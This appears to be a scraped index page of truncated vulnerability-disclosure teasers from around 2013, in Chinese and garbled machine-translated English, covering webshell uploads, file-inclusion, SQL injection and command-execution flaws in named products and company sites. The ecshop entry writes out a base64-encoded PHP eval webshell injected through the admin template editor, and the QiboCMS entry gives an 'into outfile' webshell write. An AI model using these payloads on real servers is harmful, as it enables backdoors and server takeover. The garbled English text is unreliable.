用友软件IIS写权限(PUT)导致可获取webshell控制服务器

简要描述： 1年后，用友再次爆动，菜鸟一枚，只会put,wooyun那些屌丝中的神级BOOS就莫喷了，绕道吧!听说可以换QB了，主要上来弄QB的.穷屌丝就这点追求了 详细说明： http://summit.ufida.com/ 2012年8月份检测过一次，存在，现在又来了，呵呵 PUT，大家懂得！ WooYun: 用友分站漏洞利用入侵 漏洞为什么依然存在？ 漏洞证明：...

One dedecms variable coverage holes of the wretched use of the method-vulnerability warning-the black bar safety net

The most recent dedecms variable coverage holes, and finally can control the global variables, but can not completely control $GLOBALS$v1 .= $v2; Note that there is a sliding scale, is in an initialized global variable content on a sliding scale the content. It has now been disclosed the exploit...

PHP file include vulnerability attack and Defense combat-vulnerability warning-the black bar safety net

Summary PHP is a very popular Web development language on the Internet many Web applications are using PHP development. And in the use of PHP development of Web applications, PHP file include vulnerability is a Common Vulnerability. The use of PHP file include vulnerabilities intrusion website is...

php LFI to read the php file source code as well as directly post webshell-vulnerability warning-the black bar safety net

Recently in the busy defcon topic training where a set of topics where there is a foreigner to write it is mentioned in the LFI, another tips The original text please refer to the PS: the skill is not a new technology bull God has certainly been with got bored, so when passing on the line =,= I...

ecshop最新补丁含有webshell，请各位站长注意！

简要描述： ecshop最新（2013年5月6日）补丁含有后门，请各位站长注意！补丁地址http://bbs.ecshop.com/viewthread.php?tid=1129622 下载过的请及时处理。同时希望官方以公告方式告知！ 详细说明： 官方已经停止了补丁的下载。我是从第三方 下载的补丁ecmoban.com下载的补丁 我开始以为是第三方故意写的后门于是联系了 ecmoban的人员。确定是ec论坛被挂马导致的 shell位置...

ecshop后台拿weshell

简要描述： ecshop后台拿webshell 详细说明： 模板管理--语言项编辑 如:user.php 搜索:状态 插入$$fputsfopenbase64decodeZnVjay5waHA,w,base64decodePD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4 访问http://localhost/ecshop/languages/zhcn/user.php 一句话:http://localhost/ecshop/languages/zhcn/fuck.php 漏洞证明：...

[jSQL Injection v0.4] Java tool for automatic database injection

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform Windows, Linux, Mac OS X, Solaris. Version 0.4 features: GET, POST, header, cookie methods Normal, error based, blind, time based algorithms Automatic...

Meng Jie home textile jboss configuration improper has been invaded many times-the vulnerability and early warning-the black bar safety net

Estimated you also have seen, just haven't submitted. Supposedly now is a positive card manufacturers, the author fixes it. Detailed description: Information leak: http://amb.mendale.com.cn/status?full=true From the figure we can see that in my screenshot, still someone in to access the...

File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities

Title: ====== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities Date: ===== 2013-05-04 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=939 VL-ID: ===== 939 Common Vulnerability Scoring System: ==================================== 5.9 Introduction: =============...

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities Title: ====== Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities Date: ===== 2013-04-21 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=932 VL-ID: ===== 932 Common Vulnerability Scoring System:...

cmseasy{easy through CMS}v5. 5 arbitrary file upload vulnerability in the simple analysis of reference using the method-vulnerability warning-the black bar safety net

Yesterday found someone storm out of a cmseasy v5. 5 arbitrary file upload vulnerability, it also comes with the exp. Exploit the vulnerability can directly Upload a webshell and other malicious files, the harm is huge and currently the official has not been any patches here to do some simple...

金蝶网站可执行任意命令，root权限

简要描述： 金蝶网站可执行任意命令，root权限。 详细说明： 金蝶网站用户登录的地方http://id.kingdee.com/存在命令执行漏洞，借助struts2的私有变量class.classLoader.jarPath可以执行任意命令（并且是root权限），很可能获得webshell（当然我没有尝试获取），进而可能威胁到用户的数据安全。因为是以root权限执行任意命令，可获得服务器完全控制权，并且可能以这台服务器为跳板威胁周围其它服务器的安全。 漏洞证明： 用IE浏览器访问如下链接：...

MoinMoin - Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

MoinMoin - Arbitrary Command Execution

MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...

File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities

Document Title: =============== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=939 Release Date: ============= 2013-05-04 Vulnerability Laboratory ID VL-ID: ====================================...

Hornbill Supportworks ITSM 1.0.0 - SQL Injection

Summary SQL Injection Vulnerability in ITSM component of Hornbill Supportworks Application CVE number: CVE-2013-2594 Impact: High Vendor homepage: http://www.hornbill.com Vendor notified: 19/11/2012 Vendor response: This issue has reportedly been fixed but the vendor refused to give version...

亿中邮（亿邮）信息技术官方网站沦陷,已成功进入后台

简要描述： 今天本身没事。为了不让他买叫我盲打王。 所以就打算随便找一个厂商 进行一次 脚本入侵。然后就找到了“亿中邮信息技术” 我大概说一下。没拿下webshell 后台设置了禁止写入。包括数据库备份 根本不可能。另外上传页面直接删除掉了。 但是你们网站的问题很大。 整个入侵过程一共是 20分钟。你们后台就沦陷了！·下面我大概讲一下入侵的整个思路 详细说明： 首先是网站主站有个意见反馈。然后我就很随意的 插入代码了。但是。返回的提交成功 一看就知道 dedecms页面。 然后我就知道。肯定是 失败的。 然后打开data/admin/ver.txt 发现版本很老啊。...

ThinkSNS开发的微博程序存在过滤不严

简要描述： 存在上传文件过滤不严漏洞！可直接上传ASP，PHP等网马后纂名的文件！ 详细说明： 存在上传文件过滤不严，可直接上传危险后纂名文件！ 漏洞证明： 上传WEBSHELL以后，...

用友管理员信息泄露可获得shell

简要描述： 用友官网可注入得到管理员信息，虽然本站找不到后台,但是通过社工可获得其他站点的shell. 详细说明： 此后台拿webshell的方法很多，很多都可行···· 漏洞证明：...

齐博cms后台 数据库工具处过滤不严格导致能写入一句话木马

简要描述： 假如你的账户密码泄露了 那你就危险了 在后台能直接拿webshell 详细说明： 后台为方便站长有个数据库工具 在哪里执行 Select '' into outfile 'F:/wwwroot/shiyanshi/cache/1.asp'; 就写入了一句话木马 然后就可以任意作为了 漏洞证明：...